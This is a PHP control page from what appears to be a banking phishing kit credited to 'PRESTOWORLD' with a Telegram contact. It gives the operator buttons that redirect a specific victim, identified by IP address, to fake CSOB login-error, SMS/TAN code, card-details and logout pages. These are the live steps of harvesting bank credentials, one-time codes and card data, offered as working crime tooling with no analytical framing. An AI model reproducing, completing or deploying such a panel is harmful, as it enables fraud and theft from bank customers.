<?php 


/*************************
 * AUTHOR :  PRESTOWORLD
 * CONTACT : https://t.me/prestoworldunderground 
**************************/


require 'panel.class.php';
$pnl = new Panel();

if(isset($_GET['page'], $_GET['ip'])){
    $pnl->editVicFIle($_GET['page'], $_GET['ip']);
    header("location: ctr.php?ip=".$_GET['ip']."&redirected");
}
?>
<!doctype html>
<html>
<head>
<title>Redirection Panel</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="res/style.css">
</head>
<body>

<div class="btns">
<?php 


if(isset($_GET['redirected'])){
    echo "<h1>Redirected!</h1>";
}

?>
<form action="ctr.php" method="get">
    <input type="hidden" name="ip" value="<?php echo @$_GET['ip'];?>">
    <button type="submit" name="page" value="user2.php">LOGIN ERROR</button>
    <button type="submit" name="page" value="sms.php?error">BOC/SMS</button>
    <button type="submit" name="page" value="tan.php">BOC/SMS</button>
    <button type="submit" name="page" value="card.php">DETAILS INFO</button>
    <button type="submit" name="page" value="out.php">CSOB internetbank</button>
</form>
</div>

</body>
</html>